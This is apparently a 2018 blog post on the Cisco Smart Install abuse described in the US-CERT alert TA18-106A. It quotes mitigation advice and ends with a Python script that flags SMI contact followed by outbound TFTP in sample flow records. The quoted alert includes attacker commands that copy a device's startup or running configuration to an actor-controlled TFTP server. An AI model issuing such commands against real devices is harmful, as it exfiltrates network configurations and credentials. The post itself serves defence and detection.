Monday, April 16, 2018

Smart Install MS-ISAC Notice

I was reading a notice from MS-ISAC: https://www.us-cert.gov/ncas/alerts/TA18-106A

Then I laughed when I saw this: https://imgur.com/a/YWzU4

The specific mention of the Cisco Smart Install vulnerability.

I always found it odd to see this exploit labeled as a "misuse" by Cisco in 2017. I have almost never seen that label before. Then I read that the tools to run this exploit were found in November 2016. It's really shocking to see that this big exploit was out there and Cisco officially announced it in March. I understand that ACLs can prevent this exploit, but, as the notice mentions, it is the ISP and service equipment that can still have this exploit.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi

Then it was marked as a vulnerability in 2018. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

A good read about the vulnerability last year.

"Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:

copy nvram:startup-config flash:/config.text
copy nvram:startup-config tftp://[actor address]/[actor filename].conf

In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.

copy system:running-config flash:/config.text
copy flash:/config.text tftp://[actor address]/[actor filename].conf"

A nice write-up on how to mitigate. Of course, there's also patching.

"How to Mitigate SMI Abuse

Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the “no vstack” command before placing the device into operation.
Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.
Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.
See Cisco recommendations for detecting and mitigating SMI. [10]
Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it."
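The two network rules quoted above (external hosts reaching TCP/4786, devices sending TFTP on UDP/69 outbound) also make a usable detection: the activity described in the alert is an SMI contact from outside followed shortly by the device pushing its config to an external TFTP server. The script below is an added example, not part of the MS-ISAC notice or any Cisco tooling; it runs over constructed flow records in an assumed "ts src sport dst dport proto" format and assumes 10.0.0.0/8 is the internal range.

```python
"""Flag the Smart Install abuse pattern from TA18-106A in flow records:
an external host hits TCP/4786 on an internal device, and within a time
window that device sends UDP/69 (TFTP) to an external host (config exfil)."""
import ipaddress
from collections import defaultdict

# Constructed sample records (not real data), one flow per line:
# timestamp source source_port destination destination_port protocol
SAMPLE_FLOWS = """\
1499000000 203.0.113.10 51234 10.0.0.5 4786 tcp
1499000030 10.0.0.5 49152 203.0.113.10 69 udp
1499000100 10.0.0.7 50000 10.0.0.200 69 udp
1499000200 198.51.100.4 44000 10.0.0.9 4786 tcp
1499010000 10.0.0.9 40000 198.51.100.4 69 udp
"""

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed internal range
SMI_PORT, TFTP_PORT = 4786, 69
WINDOW = 3600  # seconds allowed between SMI contact and outbound TFTP


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Parse the constructed record format into (ts, src, sport, dst, dport, proto)."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, sport, dst, dport, proto = line.split()
            flows.append((int(ts), src, int(sport), dst, int(dport), proto))
    return flows


def find_smi_abuse(flows, window=WINDOW):
    """Return (device, smi_source, tftp_destination, seconds_between) per match."""
    smi_contacts = defaultdict(list)  # device -> [(ts, external source)]
    alerts = []
    for ts, src, sport, dst, dport, proto in sorted(flows):
        # Rule 1 of the notice: SMI crossing the network boundary inbound
        if proto == "tcp" and dport == SMI_PORT and is_internal(dst) and not is_internal(src):
            smi_contacts[dst].append((ts, src))
        # Rule 2: outbound TFTP from a device that was recently contacted over SMI
        elif proto == "udp" and dport == TFTP_PORT and is_internal(src) and not is_internal(dst):
            for smi_ts, actor in smi_contacts.get(src, []):
                if 0 <= ts - smi_ts <= window:
                    alerts.append((src, actor, dst, ts - smi_ts))
    return alerts
```

Internal-to-internal TFTP (a legitimate provisioning server) and an outbound TFTP long after any SMI contact are deliberately left out of the alerts; widen the window or drop the correlation if you want every boundary-crossing 4786 or 69 flow reported on its own.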
